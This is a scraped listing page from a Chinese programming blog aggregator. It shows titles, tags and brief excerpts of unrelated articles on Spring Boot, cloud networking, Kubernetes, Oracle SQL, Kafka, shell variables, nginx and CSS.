<a class="tag" taget="_blank" href="/search/java%E6%AF%95%E8%AE%BE/1.htm">java毕设</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/%E8%AF%BE%E7%A8%8B%E8%AE%BE%E8%AE%A1/1.htm">课程设计</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/vue/1.htm">vue</a>
                        <div>️OnlineMall商城系统全解析|Vue3+SpringBoot全栈实战（附高并发与数据安全方案）一、系统架构全景基于七张效果图分析，该系统是企业级电商综合管理平台，采用SpringBoot3+Vue3+ElementPlus+MyBatisPlus技术栈，覆盖商品管理、订单处理、会员运营等核心场景。通过RBAC权限控制+Elasticsearch搜索+分布式事务三大技术亮点，支持10万级商品</div>
                    </li>
                    <li><a href="/article/1903527280550932480.htm"
                           title="通用AI Agent的进化图谱：架构革新与安全可控的双重突破——以Manus为范本的启示" target="_blank">通用AI Agent的进化图谱：架构革新与安全可控的双重突破——以Manus为范本的启示</a>
                        <span class="text-muted">我也秃了</span>
<a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84/1.htm">架构</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>通用AIAgent的进化路径：架构创新与安全管控的双重突破引言近年来，AI智能体正经历前所未有的变革。2025年3月，中国团队Monica推出的全球首款通用AIAgent——Manus，以“全链路自主执行”为核心，通过多签名系统架构和渐进式任务执行引擎，实现了从“生成建议”到“自主闭环交付任务”的范式跃迁。具体而言，Manus通过规划（Planner）-执行（Executor）-验证（Verifi</div>
                    </li>
                    <li><a href="/article/1903516050515881984.htm"
                           title="【Azure 架构师学习笔记】- Azure Networking(1) -- Service Endpoint 和 Private Endpoint" target="_blank">【Azure 架构师学习笔记】- Azure Networking(1) -- Service Endpoint 和 Private Endpoint</a>
                        <span class="text-muted">發糞塗牆</span>
<a class="tag" taget="_blank" href="/search/Azure/1.htm">Azure</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84%E5%B8%88%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/1.htm">架构师学习笔记</a><a class="tag" taget="_blank" href="/search/Azure/1.htm">Azure</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/azure/1.htm">azure</a><a class="tag" taget="_blank" href="/search/Network/1.htm">Network</a>
                        <div>本文属于【Azure架构师学习笔记】系列。本文属于【AzureNetworking】系列。前言最近公司的安全部门在审计云环境安全性时经常提到serviceendpoint（SE）和priavateendpoint（PE）的术语，为此做了一些研究储备。云计算的本质就是网络，默认情况下资源间及外部都是通过公网也就是互联网访问。为了安全，Azure引入了SE和PE等服务。云环境网络流动主要有两个：inb</div>
                    </li>
                    <li><a href="/article/1903509117251678208.htm"
                           title="掌握ChatGPT写代码的秘诀：开发者的完整指南" target="_blank">掌握ChatGPT写代码的秘诀：开发者的完整指南</a>
                        <span class="text-muted">酷酷的崽798</span>
<a class="tag" taget="_blank" href="/search/%E6%9C%BA%E5%99%A8%E5%AD%A6%E4%B9%A0/1.htm">机器学习</a><a class="tag" taget="_blank" href="/search/chatgpt/1.htm">chatgpt</a>
                        <div>文章目录前言：如何利用ChatGPT来写代码：一个深度指南1.ChatGPT的基本功能概述2.利用ChatGPT辅助代码编写的好处3.ChatGPT支持的编程语言4.如何向ChatGPT提问以获取最佳结果5.实际应用案例6.ChatGPT的局限性及其解决方法7.关于隐私和安全性的注意事项8.未来展望结论前言：如何利用ChatGPT来写代码：一个深度指南近年来，人工智能技术取得了飞跃性的进展，尤其是</div>
                    </li>
                    <li><a href="/article/1903509117905989632.htm"
                           title="【C++模板】——C++模板的力量：构建灵活与安全的代码" target="_blank">【C++模板】——C++模板的力量：构建灵活与安全的代码</a>
                        <span class="text-muted">酷酷的崽798</span>
<a class="tag" taget="_blank" href="/search/C%2FC%2B%2B/1.htm">C/C++</a><a class="tag" taget="_blank" href="/search/c%2B%2B/1.htm">c++</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>文章目录1.类型模板参数2.非类型模板参数3.模板的特化1.概念2.函数模板特化3.类模板特化4.补充5.模板编译分离解决方案优点与缺点在C++中，模板参数可以分为两大类：类型模板参数（typetemplateparameters）和非类型模板参数（non-typetemplateparameters）。这两种模板参数允许我们定义更为灵活和通用的模板代码。下面对它们分别进行介绍。1.类型模板参数类</div>
                    </li>
                    <li><a href="/article/1903503700064792576.htm"
                           title="「Kubernetes Objects」- Service（学习笔记） @20210227" target="_blank">「Kubernetes Objects」- Service（学习笔记） @20210227</a>
                        <span class="text-muted">k4nzdroid</span>

                        <div>Service，服务，用于暴露Pod以供访问。官方文档及手册KubernetesAPIv1.18/Servicev1coreService?Pod会被创建，并且还会消失，这由ReplicaSets控制。每个Pod都有自己的IP地址，但是这些IP地址不能视为可靠的。那么，如果前端的一部分Pod依赖于后端的Pod，那前端的这些Pod如何找出并追踪后端的Pod？ServiceService是一个抽象，定</div>
                    </li>
                    <li><a href="/article/1903502060016431104.htm"
                           title="JavaScript基础-API 和 Web API" target="_blank">JavaScript基础-API 和 Web API</a>
                        <span class="text-muted">難釋懷</span>
<a class="tag" taget="_blank" href="/search/%E5%89%8D%E7%AB%AF/1.htm">前端</a><a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>在现代Web开发中，API（应用程序接口）是连接不同软件组件或系统之间的桥梁。对于前端开发者来说，JavaScript与WebAPI的结合使用尤为重要，它使得我们可以访问浏览器提供的各种功能和服务，从而构建出交互性更强、用户体验更好的网页应用。本文将介绍API的基本概念，重点探讨WebAPI及其在JavaScript中的应用。一、什么是API？API全称为“ApplicationProgrammi</div>
                    </li>
                    <li><a href="/article/1903501933755297792.htm"
                           title="HBase安装" target="_blank">HBase安装</a>
                        <span class="text-muted">lianhedaxue</span>
<a class="tag" taget="_blank" href="/search/Hadoop/1.htm">Hadoop</a><a class="tag" taget="_blank" href="/search/hbase/1.htm">hbase</a>
                        <div>HBase安装本章将介绍如何安装HBase和初始配置。需要用Java和Hadoop来处理HBase，所以必须下载java和Hadoop并安装系统中。安装前设置安装Hadoop在Linux环境下之前，需要建立和使用LinuxSSH(安全Shell)。按照下面设立Linux环境提供的步骤。创建一个用户首先，建议从Unix创建一个单独的Hadoop用户，文件系统隔离Hadoop文件系统。按照下面给出创建</div>
                    </li>
                    <li><a href="/article/1903494874171240448.htm"
                           title="网络管理 Introducing Meraki – Your Complete Network Management S" target="_blank">网络管理 Introducing Meraki – Your Complete Network Management S</a>
                        <span class="text-muted">AI天才研究院</span>
<a class="tag" taget="_blank" href="/search/Python%E5%AE%9E%E6%88%98/1.htm">Python实战</a><a class="tag" taget="_blank" href="/search/%E8%87%AA%E7%84%B6%E8%AF%AD%E8%A8%80%E5%A4%84%E7%90%86/1.htm">自然语言处理</a><a class="tag" taget="_blank" href="/search/%E4%BA%BA%E5%B7%A5%E6%99%BA%E8%83%BD/1.htm">人工智能</a><a class="tag" taget="_blank" href="/search/%E8%AF%AD%E8%A8%80%E6%A8%A1%E5%9E%8B/1.htm">语言模型</a><a class="tag" taget="_blank" href="/search/%E7%BC%96%E7%A8%8B%E5%AE%9E%E8%B7%B5/1.htm">编程实践</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a><a class="tag" taget="_blank" href="/search/%E6%9E%B6%E6%9E%84%E8%AE%BE%E8%AE%A1/1.htm">架构设计</a>
                        <div>作者：禅与计算机程序设计艺术1.简介Meraki网络管理平台是一款专为企业级网络管理员设计的网络安全解决方案。它帮助用户轻松管理和监控其组织中的所有网络设备、VLANs及其设置。Meraki网络管理平台包括许多内置功能，如集中管理，安全，可视化分析等。此外，Meraki还提供强大的RESTAPI接口，开发者可以利用这些API来定制属于自己的应用。通过将现有工具、流程和工具合成为一体的网络管理解决方</div>
                    </li>
                    <li><a href="/article/1903494113383215104.htm"
                           title="Spring Boot详解" target="_blank">Spring Boot详解</a>
                        <span class="text-muted">这河里吗l</span>
<a class="tag" taget="_blank" href="/search/SpringBoot/1.htm">SpringBoot</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a>
                        <div>目录1.SpringBoot介绍1.1什么是SpringBoot1.2SpringBoot特点1.3Javaweb、spring、springmvc和springboot有什么区别？1.4SpringBoot的Starter2.SpringBoot入门HelloWorld3.SpringBoot的全局配置文件3.1properties配置文件3.2yml配置文件3.3yml与properties的</div>
                    </li>
                    <li><a href="/article/1903492975556620288.htm"
                           title="JavaScript基础-DOM事件流" target="_blank">JavaScript基础-DOM事件流</a>
                        <span class="text-muted">難釋懷</span>
<a class="tag" taget="_blank" href="/search/javascript/1.htm">javascript</a><a class="tag" taget="_blank" href="/search/%E5%BC%80%E5%8F%91%E8%AF%AD%E8%A8%80/1.htm">开发语言</a>
                        <div>在Web开发过程中，理解和掌握DOM事件流是实现高效交互的关键。DOM事件流描述了当一个事件发生时，它在文档树中的传播路径。了解事件流的概念有助于我们更精确地控制事件处理逻辑，避免不必要的行为，并提升用户体验。本文将深入探讨DOM事件流的基本概念，包括事件捕获、目标阶段和事件冒泡，并通过示例展示如何应用这些知识。一、什么是DOM事件流？DOM事件流是指事件在整个页面结构中传播的过程。根据W3C标准</div>
                    </li>
                    <li><a href="/article/1903477346560700416.htm"
                           title="Windows 和 MacOS 上安装配置ADB（安卓调试桥）" target="_blank">Windows 和 MacOS 上安装配置ADB（安卓调试桥）</a>
                        <span class="text-muted">网络安全苏柒</span>
<a class="tag" taget="_blank" href="/search/windows/1.htm">windows</a><a class="tag" taget="_blank" href="/search/macos/1.htm">macos</a><a class="tag" taget="_blank" href="/search/adb/1.htm">adb</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8/1.htm">网络安全</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/web%E5%AE%89%E5%85%A8/1.htm">web安全</a><a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>一、Android调试桥(ADB)Android调试桥（ADB）是一款多功能命令行工具，它让你能够更便捷地访问和管理Android设备。使用ADB命令，你可以轻松执行以下操作网络安全重磅福利：入门&进阶全套282G学习资源包免费分享！在设备上安装、复制和删除文件；安装应用程序；录制设备屏幕或截图；对设备进行调试，以便排查问题；检查手机上的日志文件；更新应用程序和系统组件的固件；完整地访问有关操作系</div>
                    </li>
                    <li><a href="/article/1903473439734296576.htm"
                           title="Python 应用部署云端实战指南 —— AWS、Google Cloud 与 Azure 全解析" target="_blank">Python 应用部署云端实战指南 —— AWS、Google Cloud 与 Azure 全解析</a>
                        <span class="text-muted">清水白石008</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/Python%E9%A2%98%E5%BA%93/1.htm">Python题库</a><a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/aws/1.htm">aws</a><a class="tag" taget="_blank" href="/search/azure/1.htm">azure</a>
                        <div>Python应用部署云端实战指南——AWS、GoogleCloud与Azure全解析在当下云计算飞速发展的时代，将Python应用部署到云平台已成为大多数开发者和企业的首选。无论是构建Web服务、API接口，还是自动化任务调度，云平台都能为我们提供高可靠性、弹性伸缩与简便管理的优势。本文将详细阐述如何将Python应用分别部署到AWS、GoogleCloud与Azure，并介绍各平台下涉及的部署工</div>
                    </li>
                    <li><a href="/article/1903469406525124608.htm"
                           title="AWS WAF实战指南：从入门到精通" target="_blank">AWS WAF实战指南：从入门到精通</a>
                        <span class="text-muted">ivwdcwso</span>
<a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a><a class="tag" taget="_blank" href="/search/aws/1.htm">aws</a><a class="tag" taget="_blank" href="/search/%E7%BD%91%E7%BB%9C/1.htm">网络</a><a class="tag" taget="_blank" href="/search/%E4%BA%91%E8%AE%A1%E7%AE%97/1.htm">云计算</a><a class="tag" taget="_blank" href="/search/WAF/1.htm">WAF</a><a class="tag" taget="_blank" href="/search/%E5%AE%89%E5%85%A8/1.htm">安全</a>
                        <div>1.引言AmazonWebServices(AWS)WebApplicationFirewall(WAF)是一款强大的网络安全工具，用于保护Web应用程序免受常见的Web漏洞攻击。本文将带您从入门到精通，深入探讨AWSWAF的实际应用策略，并提供具体案例，帮助您更好地保护您的Web应用程序。2.AWSWAF基础2.1什么是AWSWAF？AWSWAF是一种Web应用程序防火墙，可以帮助保护您的Web</div>
                    </li>
                    <li><a href="/article/1903468900364906496.htm"
                           title="如何在Spring Boot中设置HttpOnly Cookie以增强安全性" target="_blank">如何在Spring Boot中设置HttpOnly Cookie以增强安全性</a>
                        <span class="text-muted">遥不可及~~斌</span>
<a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/boot/1.htm">boot</a><a class="tag" taget="_blank" href="/search/%E5%90%8E%E7%AB%AF/1.htm">后端</a><a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                        <div>引言在Web开发中，Cookie是用于在客户端和服务器之间传递信息的重要机制。然而，Cookie的安全性一直是一个备受关注的问题。特别是当Cookie中存储了敏感信息（如会话ID）时，如何防止这些信息被恶意脚本窃取就显得尤为重要。HttpOnly属性是增强Cookie安全性的一种有效手段。本文将详细介绍如何在SpringBoot中设置HttpOnlyCookie，并探讨其背后的安全机制。什么是Ht</div>
                    </li>
                    <li><a href="/article/1903465500550164480.htm"
                           title="探索安全的开发之路：Eclipse Steady深度揭秘" target="_blank">探索安全的开发之路：Eclipse Steady深度揭秘</a>
                        <span class="text-muted">尚竹兴</span>

                        <div>探索安全的开发之路：EclipseSteady深度揭秘steadyEclipseSteady:这是一个开源的持续集成和持续部署工具，用于自动化软件的开发和部署过程。它提供了一个基于Web的界面，用于创建和管理软件项目的构建和部署流程。适合用于需要自动化软件开发和部署的开发团队。特点包括简单易用、丰富的插件生态系统和与Maven和Jenkins的紧密集成。项目地址:https://gitcode.c</div>
                    </li>
                    <li><a href="/article/1903465373391450112.htm"
                           title="探索数据安全新境界：Apache Spark SQL Ranger Security插件深度揭秘" target="_blank">探索数据安全新境界：Apache Spark SQL Ranger Security插件深度揭秘</a>
                        <span class="text-muted">乌昱有Melanie</span>

                        <div>探索数据安全新境界：ApacheSparkSQLRangerSecurity插件深度揭秘项目地址:https://gitcode.com/gh_mirrors/sp/spark-ranger随着大数据的爆炸性增长，数据安全性成为了企业不可忽视的核心议题。在这一背景下，【ApacheSparkSQLRangerSecurityPlugin】以其强大的数据访问控制能力脱颖而出，成为数据处理领域的明星级</div>
                    </li>
                    <li><a href="/article/1903465246547308544.htm"
                           title="使用 Selenium 控制现有 Edge 窗口以规避爬虫检测" target="_blank">使用 Selenium 控制现有 Edge 窗口以规避爬虫检测</a>
                        <span class="text-muted">秋叶原の黑猫</span>
<a class="tag" taget="_blank" href="/search/%E6%95%B0%E6%8D%AE%E5%BA%93/1.htm">数据库</a>
                        <div>在网络爬虫开发中，网站的防爬机制常常会检测自动化工具（如Selenium）启动的浏览器实例。为了绕过这种检测，一种有效的方法是利用Selenium连接到手动打开的现有浏览器窗口，而不是每次都启动一个新的实例。本文将详细介绍如何使用Selenium控制现有的MicrosoftEdge浏览器窗口，并结合代码示例展示实现过程。1.背景介绍：为什么需要控制现有窗口？传统的Selenium脚本会通过WebD</div>
                    </li>
                                <li><a href="/article/45.htm"
                                       title="安装数据库首次应用" target="_blank">安装数据库首次应用</a>
                                    <span class="text-muted">Array_06</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>可是为什么再一次失败之后就变成直接跳过那个要求 
enter full pathname of java.exe的界面 
 
 
这个java.exe是你的Oracle 11g安装目录中例如：【F:\app\chen\product\11.2.0\dbhome_1\jdk\jre\bin】下的java.exe 。不是你的电脑安装的java jdk下的java.exe！ 
注意第一次，使用SQL D</div>
                                </li>
                                <li><a href="/article/172.htm"
                                       title="Weblogic Server Console密码修改和遗忘解决方法" target="_blank">Weblogic Server Console密码修改和遗忘解决方法</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/Welogic/1.htm">Welogic</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在工作中一同事将Weblogic的console的密码忘记了，通过网上查询资料解决，实践整理了一下。 
一.修改Console密码 
&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 打开weblogic控制台，安全领域&nbsp;--&gt; myrealm --&gt;&n</div>
                                </li>
                                <li><a href="/article/299.htm"
                                       title="IllegalStateException: Cannot forward a response that is already committed" target="_blank">IllegalStateException: Cannot forward a response that is already committed</a>
                                    <span class="text-muted">Cwind</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/Servlets/1.htm">Servlets</a>
                                    <div>对于初学者来说，一个常见的误解是：当调用 forward() 或者 sendRedirect() 时控制流将会自动跳出原函数。标题所示错误通常是基于此误解而引起的。   示例代码：   
protected void doPost() {
    if (someCondition) {
        sendRedirect();
    }
    forward(); // Thi</div>
                                </li>
                                <li><a href="/article/426.htm"
                                       title="基于流的装饰设计模式" target="_blank">基于流的装饰设计模式</a>
                                    <span class="text-muted">木zi_鸣</span>
<a class="tag" taget="_blank" href="/search/%E8%AE%BE%E8%AE%A1%E6%A8%A1%E5%BC%8F/1.htm">设计模式</a>
                                    <div>当想要对已有类的对象进行功能增强时，可以定义一个类，将已有对象传入，基于已有的功能，并提供加强功能。 
自定义的类成为装饰类 
 
模仿BufferedReader，对Reader进行包装，体现装饰设计模式 
 
装饰类通常会通过构造方法接受被装饰的对象，并基于被装饰的对象功能，提供更强的功能。 
装饰模式比继承灵活，避免继承臃肿，降低了类与类之间的关系 
 
装饰类因为增强已有对象，具备的功能该</div>
                                </li>
                                <li><a href="/article/553.htm"
                                       title="Linux中的uniq命令" target="_blank">Linux中的uniq命令</a>
                                    <span class="text-muted">被触发</span>
<a class="tag" taget="_blank" href="/search/linux/1.htm">linux</a>
                                    <div>Linux命令uniq的作用是过滤重复部分显示文件内容，这个命令读取输入文件，并比较相邻的行。在正常情 况下，第二个及以后更多个重复行将被删去，行比较是根据所用字符集的排序序列进行的。该命令加工后的结果写到输出文件中。输入文件和输出文件必须不同。如 果输入文件用“- ”表示，则从标准输入读取。 
AD： 
uniq [选项] 文件 
说明：这个命令读取输入文件，并比较相邻的行。在正常情况下，第二个</div>
                                </li>
                                <li><a href="/article/680.htm"
                                       title="正则表达式Pattern" target="_blank">正则表达式Pattern</a>
                                    <span class="text-muted">肆无忌惮_</span>
<a class="tag" taget="_blank" href="/search/Pattern/1.htm">Pattern</a>
                                    <div>正则表达式是符合一定规则的表达式，用来专门操作字符串，对字符创进行匹配，切割，替换，获取。 
&nbsp; 
例如，我们需要对QQ号码格式进行检验 
规则是长度6~12位 &nbsp;不能0开头 &nbsp;只能是数字，我们可以一位一位进行比较，利用parseLong进行判断，或者是用正则表达式来匹配[1-9][0-9]{4,14}&nbsp;或者&nbsp;[1-9]\d{4,14} 
&nbs</div>
                                </li>
                                <li><a href="/article/807.htm"
                                       title="Oracle高级查询之OVER (PARTITION BY ..)" target="_blank">Oracle高级查询之OVER (PARTITION BY ..)</a>
                                    <span class="text-muted">知了ing</span>
<a class="tag" taget="_blank" href="/search/oracle/1.htm">oracle</a><a class="tag" taget="_blank" href="/search/sql/1.htm">sql</a>
                                    <div>一、rank()/dense_rank() over(partition by ...order by ...) 
 
现在客户有这样一个需求，查询每个部门工资最高的雇员的信息，相信有一定oracle应用知识的同学都能写出下面的SQL语句： 
 
 select e.ename, e.job, e.sal, e.deptno  
  from scott.emp e,  
       (se</div>
                                </li>
                                <li><a href="/article/934.htm"
                                       title="Python调试" target="_blank">Python调试</a>
                                    <span class="text-muted">矮蛋蛋</span>
<a class="tag" taget="_blank" href="/search/python/1.htm">python</a><a class="tag" taget="_blank" href="/search/pdb/1.htm">pdb</a>
                                    <div>原文地址： 
http://blog.csdn.net/xuyuefei1988/article/details/19399137 
1、下面网上收罗的资料初学者应该够用了，但对比IBM的Python 代码调试技巧： 
 
IBM：包括 pdb 模块、利用 PyDev 和 Eclipse 集成进行调试、PyCharm 以及 Debug 日志进行调试： 
 
http://www.ibm.com/d</div>
                                </li>
                                <li><a href="/article/1061.htm"
                                       title="webservice传递自定义对象时函数为空，以及boolean不对应的问题" target="_blank">webservice传递自定义对象时函数为空，以及boolean不对应的问题</a>
                                    <span class="text-muted">alleni123</span>
<a class="tag" taget="_blank" href="/search/webservice/1.htm">webservice</a>
                                    <div>今天在客户端调用方法 
NodeStatus status=iservice.getNodeStatus(). 
 
结果NodeStatus的属性都是null。 
 
进行debug之后，发现服务器端返回的确实是有值的对象。 
 
后来发现原来是因为在客户端，NodeStatus的setter全部被我删除了。 
本来是因为逻辑上不需要在客户端使用setter， 结果改了之后竟然不能获取带属性值的</div>
                                </li>
                                <li><a href="/article/1188.htm"
                                       title="java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针" target="_blank">java如何干掉指针，又如何巧妙的通过引用来操作指针————>说的就是java指针</a>
                                    <span class="text-muted">百合不是茶</span>

                                    <div>C语言的强大在于可以直接操作指针的地址，通过改变指针的地址指向来达到更改地址的目的,又是由于c语言的指针过于强大，初学者很难掌握， java的出现解决了c，c++中指针的问题 java将指针封装在底层，开发人员是不能够去操作指针的地址，但是可以通过引用来间接的操作： 
&nbsp; 
定义一个指针p来指向a的地址（&amp;是地址符号）： 
&nbsp; &nbsp; &nbsp; &nbsp; </div>
                                </li>
                                <li><a href="/article/1315.htm"
                                       title="Eclipse打不开，提示“An error has occurred.See the log file ***/.log”" target="_blank">Eclipse打不开，提示“An error has occurred.See the log file ***/.log”</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/eclipse/1.htm">eclipse</a>
                                    <div>打开eclipse工作目录的\.metadata\.log文件，发现如下错误： 
 
!ENTRY org.eclipse.osgi 4 0 2012-09-10 09:28:57.139 
!MESSAGE Application error 
!STACK 1 
java.lang.NoClassDefFoundError: org/eclipse/core/resources/IContai</div>
                                </li>
                                <li><a href="/article/1442.htm"
                                       title="spring aop实例annotation方法实现" target="_blank">spring aop实例annotation方法实现</a>
                                    <span class="text-muted">bijian1013</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/spring/1.htm">spring</a><a class="tag" taget="_blank" href="/search/AOP/1.htm">AOP</a><a class="tag" taget="_blank" href="/search/annotation/1.htm">annotation</a>
                                    <div>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 在spring aop实例中我们通过配置xml文件来实现AOP，这里学习使用annotation来实现，使用annotation其实就是指明具体的aspect,pointcut和advice。1.申明一个切面(用一个类来实现)在这个切面里,包括了advice和pointcut 
AdviceMethods.jav</div>
                                </li>
                                <li><a href="/article/1569.htm"
                                       title="[Velocity一]Velocity语法基础入门" target="_blank">[Velocity一]Velocity语法基础入门</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/velocity/1.htm">velocity</a>
                                    <div>用户和开发人员参考文档 
http://velocity.apache.org/engine/releases/velocity-1.7/developer-guide.html 
&nbsp; 注释 
1.行级注释## 
2.多行注释#*&nbsp; *# 
&nbsp; 变量定义 
使用$开头的字符串是变量定义，例如$var1, $var2, 
&nbsp; 赋值 
使用#set为变量赋值，例</div>
                                </li>
                                <li><a href="/article/1696.htm"
                                       title="【Kafka十一】关于Kafka的副本管理" target="_blank">【Kafka十一】关于Kafka的副本管理</a>
                                    <span class="text-muted">bit1129</span>
<a class="tag" taget="_blank" href="/search/kafka/1.htm">kafka</a>
                                    <div>1. 关于request.required.acks 
&nbsp; 
request.required.acks控制者Producer写请求的什么时候可以确认写成功，默认是0， 
0表示即不进行确认即返回。 
1表示Leader写成功即返回，此时还没有进行写数据同步到其它Follower Partition中 
-1表示根据指定的最少Partition确认后才返回，这个在 
&nbsp; 
Th</div>
                                </li>
                                <li><a href="/article/1823.htm"
                                       title="lua统计nginx内部变量数据" target="_blank">lua统计nginx内部变量数据</a>
                                    <span class="text-muted">ronin47</span>
<a class="tag" taget="_blank" href="/search/lua+nginx%E3%80%80+%E7%BB%9F%E8%AE%A1/1.htm">lua nginx　 统计</a>
                                    <div>server {
    listen 80;
    server_name photo.domain.com;
    location /{set $str $uri;
        content_by_lua '
            local url = ngx.var.uri
            local res = ngx.location.capture(</div>
                                </li>
                                <li><a href="/article/1950.htm"
                                       title="java-11.二叉树中节点的最大距离" target="_blank">java-11.二叉树中节点的最大距离</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a>
                                    <div>
import java.util.ArrayList;
import java.util.List;


public class MaxLenInBinTree {

	/*
	 a.			1
	 		   /  \
	 		  2    3
	 		 / \  / \
	 		4   5 6  7
	 	max=4	pass &quot;root&quot;
	 </div>
                                </li>
                                <li><a href="/article/2077.htm"
                                       title="Netty源码学习-ReadTimeoutHandler" target="_blank">Netty源码学习-ReadTimeoutHandler</a>
                                    <span class="text-muted">bylijinnan</span>
<a class="tag" taget="_blank" href="/search/java/1.htm">java</a><a class="tag" taget="_blank" href="/search/netty/1.htm">netty</a>
                                    <div> 
ReadTimeoutHandler的实现思路： 
开启一个定时任务，如果在指定时间内没有接收到消息，则抛出ReadTimeoutException 
这个异常的捕获，在开发中，交给跟在ReadTimeoutHandler后面的ChannelHandler，例如 
 
 

private final ChannelHandler timeoutHandler =
	new ReadTim</div>
                                </li>
                                <li><a href="/article/2204.htm"
                                       title="jquery验证上传文件样式及大小(好用)" target="_blank">jquery验证上传文件样式及大小(好用)</a>
                                    <span class="text-muted">cngolon</span>
<a class="tag" taget="_blank" href="/search/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0/1.htm">文件上传</a><a class="tag" taget="_blank" href="/search/jquery%E9%AA%8C%E8%AF%81/1.htm">jquery验证</a>
                                    <div>&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
    &lt;meta http-equiv=&quot;Content-Type&quot; content=&quot;text/html; charset=utf-8&quot; /&gt;
    &lt;script src=&quot;jquery1.8/jquery-1.8.0.</div>
                                </li>
                                <li><a href="/article/2331.htm"
                                       title="浏览器兼容【转】" target="_blank">浏览器兼容【转】</a>
                                    <span class="text-muted">cuishikuan</span>
<a class="tag" taget="_blank" href="/search/css/1.htm">css</a><a class="tag" taget="_blank" href="/search/%E6%B5%8F%E8%A7%88%E5%99%A8/1.htm">浏览器</a><a class="tag" taget="_blank" href="/search/IE/1.htm">IE</a>
                                    <div>浏览器兼容问题一：不同浏览器的标签默认的外补丁和内补丁不同 
 
问题症状：随便写几个标签，不加样式控制的情况下，各自的margin 和padding差异较大。 
 
碰到频率:100% 
 
解决方案：CSS里&nbsp;&nbsp;&nbsp; *{margin:0;padding:0;} 
 
备注：这个是最常见的也是最易解决的一个浏览器兼容性问题，几乎所有的CSS文件开头都会用通配符*来设</div>
                                </li>
                                <li><a href="/article/2458.htm"
                                       title="Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数" target="_blank">Shell特殊变量：Shell $0, $#, $*, $@, $?, $$和命令行参数</a>
                                    <span class="text-muted">daizj</span>
<a class="tag" taget="_blank" href="/search/shell/1.htm">shell</a><a class="tag" taget="_blank" href="/search/%24%23/1.htm">$#</a><a class="tag" taget="_blank" href="/search/%24%3F/1.htm">$?</a><a class="tag" taget="_blank" href="/search/%E7%89%B9%E6%AE%8A%E5%8F%98%E9%87%8F/1.htm">特殊变量</a>
                                    <div>前面已经讲到，变量名只能包含数字、字母和下划线，因为某些包含其他字符的变量有特殊含义，这样的变量被称为特殊变量。例如，$ 表示当前Shell进程的ID，即pid，看下面的代码：   
 
  $echo $$  
   
运行结果 
29949 
&nbsp;  特殊变量列表   变量 含义   $0 当前脚本的文件名   $n 传递给脚本或函数的参数。n 是一个数字，表示第几个参数。例如，第一个</div>
                                </li>
                                <li><a href="/article/2585.htm"
                                       title="程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!" target="_blank">程序设计KISS 原则-------KEEP IT SIMPLE, STUPID!</a>
                                    <span class="text-muted">dcj3sjt126com</span>
<a class="tag" taget="_blank" href="/search/unix/1.htm">unix</a>
                                    <div>翻到一本书，讲到编程一般原则是kiss：Keep It Simple, Stupid.对这个原则深有体会，其实不仅编程如此，而且系统架构也是如此。 
